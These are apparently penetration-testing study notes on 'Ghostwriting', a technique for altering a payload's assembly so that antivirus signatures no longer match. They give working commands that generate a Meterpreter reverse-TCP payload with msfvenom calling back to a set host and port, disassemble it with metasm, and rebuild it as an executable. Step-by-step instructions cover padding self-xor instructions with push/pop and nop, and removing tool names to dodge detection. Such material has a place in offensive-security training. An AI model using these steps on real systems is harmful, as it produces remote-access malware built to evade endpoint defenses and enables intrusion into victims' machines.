- Changing of the Assembly source code, to alter the well known signature used by anti-virus engines.
- Overview
Create a .exe
Convert it to .asm
Edit the .asm file
Convert back to .exe
- Most of the time you dont want to alter the functionality of the binary.
- Some additional (outside of Ghostwriting) things that can help with evading signatures are:
Removing the Help menu of a tool
Removing instances of the tool name in the source code
- Generate a
msfvenom payload for example
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -f raw -o payload.raw --platform windows -a x86
ruby /opt/metasm/samples/disassemble.rb payload.raw > payload.asm
- Now open the file in
gedit
- At the very top of the file add:
.section '.text' rwx
.entrypoint
- Now start by finding any instance of
xor where a register is xor (ed) against itself.
- When something is
xor against it self, it will clear the register to a value of 0
- For example look for something like this
- Because the normal code execution will clear out any value in
eax we can add additional instructions before the xor
- Thus we can add this in before the
xor statement
push eax
pop eax
xor eax, eax
- Also feel free to add in other additional irrelevant instructions before an
xor occurs. Remember only where an operand is xor with itself.
- Also can add
nop instructions into the program at the correct places.
- Testing is your best friend here
- Once you are done altering the
asm it is time to convert it back to an exe
ruby /opt/metasm/samples/peencode.rb payload.asm -o payload.exe